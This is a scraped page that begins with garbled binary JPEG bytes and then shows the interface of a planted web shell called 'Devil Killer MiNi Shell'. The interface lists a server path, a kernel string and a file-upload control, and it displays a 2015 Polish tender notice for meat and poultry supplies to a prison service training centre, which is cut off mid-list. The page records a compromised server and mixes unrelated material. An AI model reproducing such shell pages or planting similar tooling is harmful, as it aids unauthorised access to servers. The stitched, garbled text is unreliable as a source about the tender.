JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150126/10825-N-2015.html

<p class="kh_header"><b>Popów: Dostawy drobiu, wędlin, mięsa oraz  podrobów  dla OSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie.</b><br>
<b>Numer ogłoszenia: 10825 - 2015; data zamieszczenia: 26.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Szkolenia Służby Więziennej w Kulach , Kule 2, 42-110 Popów, woj. śląskie, tel. 034 3104030, faks 034 3103653.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Szkolenia Służby Więziennej w Kulach.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy drobiu, wędlin, mięsa oraz  podrobów  dla OSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia , na potrzeby Ośrodka Szkolenia Służby Więziennej w Kulach oraz Oddziału Zamiejscowego w Sulejowie, są  dostawy drobiu, wędlin, mięsa oraz  podrobów. Zamawiający dopuszcza składanie ofert częściowych od 1-4. 
Zadanie nr 1 dostawy drobiu i jego przetworów dla OSSW w Kulach - 1.	Filet z indyka kg	600 2.	Filet z kurczaka	kg	1 000, 3.	Ćwiartka z kurczaka kg	1 000
4. Żołądki drobiowe z kurczaka kg 200
Szczegółowe informacje dotyczące przedmiotu zamówienia zawiera załącznik nr 6 do SIWZ
Zadanie nr 2 dostawy  wędlin, mięsa oraz podrobów dla OSSW  w Kulach - 1.		Baleron	kg	250
2.		Blok szynkowy	kg	150
3.		Kiełbasa szynkowa 	kg	200
4.		Kiełbasa śląska	kg	800
5.		Kiełbaski śląskie	kg	400
6.		Ogonówka	kg	200
7.		Parówki śląskie	kg	350
8.		Polędwica drobiowa	kg	200
9.		Rolada schabowa	kg	200
10.		Szynka gotowana	kg	200
11.		Szynka wiejska	kg	200
12.		Szynka z indyka	kg	150
13.		Wędzonka myśliwska	kg	150
14.		Wędzonka chłopska	kg	150
15.		Boczek wędzony	kg	400
16.		Karczek pieczony	kg	200
17.		Kiełbasa biała	kg	300
18.		Kiełbasa parówkowa	kg	200
19.		Sopel z indyka	kg	150
20.		Pasztet wieprzowy	kg	100
21.		Polędwica parzona	kg	200
22.		Schab pieczony	kg	150
23.		Blok łopatkowy	kg	150
24.		Pieczeń 	kg	100
25.		Antrykot	kg	1500
26.		Karkówka z/k	kg	1000
27.		Łopatka z/k	kg	1000
28.		Schab z/k	kg	1500
29.		Wołowina b/k	kg	1000
30.		Golonka z/k	kg	400
31.		Golonka b/k	kg	300
32.		Żeberka wieprzowe 	kg	300
33.		Flaki	kg	200
34.		Kaszanka	kg	200
35.		Smalec	kg	250
36.		Wątroba	kg	150
37.		Słonina	kg	50
Zadanie nr 3 dostawy , drobiu i jego przetworów dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie 
1	Uda całe z kurczaka 	kg	700
2	Filet z piersi kurczaka b/k 	kg	600
3	Porcja rosołowa	kg	700
4	Skrzydło indycze	kg	700
5	Wątroba z kurczaka 	kg	400
6	Żołądki z indyka 	kg	100

Zadanie nr 4 dostawy wędlin, mięsa oraz podrobów dla OSSW  w Kulach Oddział Zamiejscowy w Sulejowie
1.		Baleron	kg	250
2.		Blok szynkowy 	kg	120
3.		Salami	kg	120
4.		Kiełbasa krakowska sucha	kg	250
5.		Kiełbasa szynkowa 	kg	250
6.		Kiełbasa śląska 	kg	500
7.		Kabanosy	kg	150
8.		Szynka tyrolska	kg	200
9.		Parówki 	kg	300
10.		Rolada schabowa 	kg	150
11.		Szynka wiejska 	kg	120
12.		Boczek wędzony 	kg	300
13.		Kiełbasa biała 	kg	200
14.		Pasztet wieprzowy 	kg	60
15.		Kiszka pasztetowa	kg	60
16.		Salceson ozorkowy	kg	150
17.		Polędwica sopocka 	kg	200
18.		Pieczeń 	kg	60
19.		Żebro wołowe 	kg	200
20.		Karkówka b/k 	kg	600
21.		Łopatka b/k 	kg	500
22.		Schab b/k 	kg	600
23.		Mięso wieprzowe drobne	kg	300
24.		Wołowina b/k 	kg	300
25.		Golonka z/k peklowana 	kg	50
26.		Żeberka wieprzowe 	kg	200
27.		Flaki 	kg	150
28.		Kaszanka 	kg	100
29.		Wątroba	kg	50
30.		Słonina	kg	100
31.		Smalec	kg	50
32.		Polędwica drobiowa prasowana 	kg	200
33.		Szynka drobiowa 	kg	200
34.		Schabik drobiowy 	kg	150
35.		Kiełbasa drobiowa podsuszana	kg	50
36.		Parówki drobiowe 	kg	100
37.		Filet wędzony z indyka 	kg	50
38.		Polędwica drobiowa w galarecie	kg	120
39.		Kurczak faszerowany 	kg	150
40.		Mortadela drobiowa z warzywami	kg	200
41.		Smaczek	kg	120
42.		Kiełbasa parówkowa	kg	300
43.		Karczek pieczony	kg	100
44.		Schab pieczony	kg	100.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7, 15.13.11.30-5, 15.13.11.35-0, 15.13.10.00-5, 15.11.11.00-0, 15.11.30.00-3, 15.10.00.00-9, 15.13.11.34-3, 15.41.21.00-0, 15.13.13.10-1, 15.13.16.00-1, 15.11.40.00-0, 15.13.15.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.02.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz ofertowy stanowiący załącznik nr 1 do SIWZ, 
wypełniony i podpisany formularz cenowy w zakresie zadań od nr 1-4 stanowiący załącznik nr 2 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Szkolenia Służby Więziennej w Kulach
Kule 2 42-110 Popów
Pokój nr 2,3 dział kwatermistrzowski  pawilon Warta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2015 godzina 10:00, miejsce: Ośrodek Szkolenia Służby Więziennej w Kulach
Kule 2 
42-110 Popów
Pokój nr 3 sekretariat pawilon Liswarta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy drobiu i jego przetworów dla OSSW w Kulach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Filet z indyka
	15112100-7
PN-A-86524	Filety z indyka pochodzące z tuszki indyka o masie ciała ok. 10 kg. Powierzchnia nie zakrwawiona, bez opiłków kości; zgodnie z Polską Normą
Mięso świeże, wyklucza się mięso mrożone.	kg	600
2.	Filet z kurczaka	15112100-7
PN-A-86524	Filet pochodzący z brojlera rzeźnego o masie ciała od 2 do 2,5 kg. Powierzchnia nie zakrwawiona, bez opiłków kości; zgodnie z PN
Mięso świeże, wyklucza się mięso mrożone.	kg	1 000
3.	Ćwiartka z kurczaka	15112100-7
PN-A-86524	Ćwiartka tylnia  pochodząca z brojlera rzeźnego o masie ciała od 2 do 2,5 kg. Powierzchnia nie zakrwawiona, bez opiłków kości; zgodnie z PN.
Mięso świeże, wyklucza się mięso mrożone.	kg	1 000
4.	Żołądki drobiowe
z kurczaka	15112100-7
PN-A-86524	Żołądki drobiowe, oczyszczone, pozbawione treści pokarmowej, nie połamane, bez przebarwień, zgodne z normą PN.
Żołądki świeże, wyklucza się żołądki mrożone.	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy  wędlin, mięsa oraz podrobów dla OSSW  w Kulach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Baleron	15131130-5
PN-A-82007	Mięso wieprzowe,- przyprawy. Kształt uzależniony od mięśnia, użytej osłonki, siatki formującej lub sposobu wiązania.
 Powierzchnia nieuszkodzona, czysta sucha dla wędzonek gotowanych lekko wilgotna. Struktura plastra o grubości 3 mm dość ścisła.   Konsystencja soczysta , krucha, powierzchnia przekroju lekko wilgotna. Barwa charakterystyczna dla danego sortymentu, uzależniona od obróbki cieplnej lub jej braku. 
Smak i zapach charakterystyczne dla danego sortymentu. Zapach charakterystyczny dla procesu wędzenia. Produkowany zgodnie z recepturami odpowiednio do asortymentu metodą tradycyjną oraz  zgodnie z PN.  
Niedopuszczalne  są skupiska galarety na przekroju oraz wyciek soku.
Niedopuszczalny  jest smak i zapach świadczący o nieświeżości lub inny obcy.
Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych.
	kg	250
2.	Blok szynkowy
	15131130-5
PN-A-82007	Mięso wieprzowe z szynki wieprzowej. Smak charakterystyczny dla poszczególnych przypraw i surowców, powierzchnia bez zanieczyszczeń i śladów pleśni. Produkowany metodą tradycyjną bez konserwantów.
Niedopuszczalny  jest smak i zapach świadczący o nieświeżości lub inny obcy.
 Zamawiający nie dopuszcza wędlin pakowanych próżniowo  i  mrożonych.	kg	150
3.	Kiełbasa szynkowa 
	15131130-5
PN-A-82007	Mięso wieprzowe grubo rozdrobnione z szynki, przyprawy. Konsystencja zwięzła. Powierzchnia batonu brązowa błyszcząca, bez zanieczyszczeń i śladów pleśni. Produkowana zgodnie z procedurą  metodą tradycyjną oraz PN.
Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy.
 Zamawiający nie dopuszcza  wędlin pakowanych próżniowo i mrożonych.	kg	200
4.	Kiełbasa śląska
	15131130-5
PN-A-82007	Mięso wieprzowe średnio rozdrobnione bez dodatków białka roślinnego, przyprawy. Konsystencja zwięzła. Powierzchnia bez zanieczyszczeń i śladów pleśni. Plaster o grubości 3mm nie powinien rozpadać się w temp 18 °C. Zapach charakterystyczny dla procesu wędzenia .Produkowana zgodnie z procedurą metodą tradycyjną oraz PN.
Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy.
Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych.	kg	800
5.	Kiełbaski śląskie
	15131130-5
PN-A-82007	Mięso wieprzowe średnio rozdrobnione bez dodatków białka roślinnego, przyprawy.
Zapach charakterystyczny dla procesu wędzenia Produkowane zgodnie z procedurą  metodą tradycyjną oraz PN. Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy.  Zamawiający nie dopuszcza wędlin pakowanych próżniowo  i mrożonych.	kg	400
6.	Ogonówka
	15131130-5
PN-A-82007	Mięsień wieprzowy wędzony i parzony. Rozdrobnienie: całe elementy, barwa charakterystyczna dla asortymentu, powierzchnia nieuszkodzona, bez zanieczyszczeń i śladów pleśni. Konsystencja zwięzła. Produkowana zgodnie z procedurą  metodą tradycyjną oraz PN. Niedopuszczalne skupiska galarety na przekroju oraz wyciek soku. Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy.
 Zamawiający nie dopuszcza wędlin pakowanych próżniowo  i mrożonych.
	kg	200
7.	Parówki śląskie
	15131130-5
PN-A-82007	Mięso wieprzowo - wołowe drobno rozdrobnione, podgardle wieprzowe, bez dodatków modyfikujących. Konsystencja zwięzła. Powierzchnia nieuszkodzona, bez śladów pleśni. Produkowane zgodnie z recepturą metodą tradycyjną oraz PN.
Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych.	kg	350
8.	Polędwica drobiowa
	15131135-0
PN-A-86526	Mięso: filet z  indyka, przyprawy. Konsystencja zwięzła. Powierzchnia bez zanieczyszczeń i pleśni. Produkowana zgodnie z recepturą  metodą tradycyjną oraz PN. Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych.
Niedopuszczalne są zabrudzenia, okopcenia, oślizłość powierzchni wyrobu i naloty pleśni. Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy.	kg	200
9.	Rolada schabowa
	15131130-5
PN-A-82007	Mięsień grzbietu wieprzowy poddany obróbce parzenia i wędzenia, formowany. Produkowana zgodnie z recepturą  metoda tradycyjną oraz PN. niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych.	kg	200
10.	Szynka gotowana
	15131130-5
PN-A-82007	Mięso z szynki wieprzowej parzone i wędzone w osłonce. Rozdrobnienie: całe elementy. Konsystencja zwięzła. Powierzchnia przekroju lekko wilgotna  Struktura plastra o grubości 3mm dość ścisła. Produkowana zgodnie z recepturą  metoda tradycyjną oraz PN.
 Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych .	kg	200
11.	Szynka wiejska
	15131130-5
PN-A-82007	Mięso z szynki wieprz. parzone, sznurowane. Rozdrobnienie: całe elementy. Konsystencja zwięzła. Powierzchnia nieuszkodzona, bez zanieczyszczeń i śladów pleśni, produkowana zgodnie z recepturą  metodą tradycyjna i PN. Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych.	kg	200
12.	Szynka z indyka
	15131135-0
PN-A-86526	Filet z indyka wędzony i parzony w osłonce ( całe elementy) Konsystencja  soczysta, plaster o grubości 3 mm nie powinien rozpadać się. Barwa charakterystyczna i typowa dla użytego mięsa drobiowego i zastosowanej obróbki technologicznej.
Niedopuszczalna jest barwa szarozielona lub inna nietypowa. Smak i zapach powinien być typowy dla mięsa drobiowego poddanego obróbce termicznej dla gatunku drobiu i zastosowanego procesu technologicznego. Wyczuwalny ma być smak i zapach użytych przypraw. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy, np gorzki, kwaśny , pleśniowy. Produkowana zgodnie z recepturą  metodą tradycyjną oraz PN. Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych.	kg	150
13.	Wędzonka myśliwska
	15131130-5
PN-A-82206	Mięso wieprzowe grubo rozdrobnione, przyprawy. Powierzchnia nieuszkodzona, bez zanieczyszczeń i śladów pleśni. Produkowana zgodnie z recepturą  metoda tradycyjną oraz Polską Normą. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy, np: gorzki, kwaśny , pleśniowy.
 Zamawiający nie dopuszcza wędlin pakowanych próżniowo i  mrożonych.	kg	150
14.	Wędzonka chłopska
	15131130-5
PN-A-82206	Mięso wieprzowe, przyprawy. Powierzchnia nieuszkodzona, bez zanieczyszczeń i pleśni. Produkowana zgodnie z recepturą  metoda tradycyjną oraz PN. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy, np gorzki, kwaśny , pleśniowy.
Zamawiający nie dopuszcza wędlin pakowanych próżniowo  i mrożonych.	kg	150
15.	Boczek wędzony
	15131130-5
PN-A-82007	Dolna część tłuszczowo - mięsna. Rozdrobnienie: całe elementy. Barwa charakterystyczna dla asortymentu. Powierzchnia nieuszkodzona, bez zanieczyszczeń i pleśni. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy, np. gorzki, kwaśny , pleśniowy
Zamawiający nie dopuszcza boczku pakowanego próżniowo oraz mrożonego.	kg	400
16.	Karczek pieczony
	15131130-5
PN-A-82007	Mięso z karczku. Powierzchnia nieuszkodzona, bez zanieczyszczeń i pleśni. Produkowany zgodnie z recepturą  metoda tradycyjną oraz PN. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy, np gorzki, kwaśny , pleśniowy.
 Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych.	kg	200
17.	Kiełbasa biała
	15131130-5
PN-A-82007	Mięso wieprzowe średnio rozdrobnione, przyprawy. Struktura właściwa dla danego stopnia rozdrobnienia. Składniki równomiernie rozmieszczone, konsystencja zwięzła Plaster o grubości 3 mm nie powinien rozpadać się w temperaturze 18 C. Barwa charakterystyczna  dla sortymentu w zależności od użytych surowców , dodatków i przypraw ; mięsa- jasnoróżowa do ciemnoczerwonej, barwa tłuszczu - biała lub kremowa. Smak charakterystyczny dla poszczególnych przypraw i surowców.
 Produkowana zgodnie z procedurą  metodą tradycyjną oraz PN. Niedopuszczalny smak i zapach świadczący  o nieświeżości lub inny obcy.  Zamawiający nie dopuszcza wędlin pakowanych próżniowo  i mrożonych.	kg	300
18.	Kiełbasa parówkowa
	15131130-5
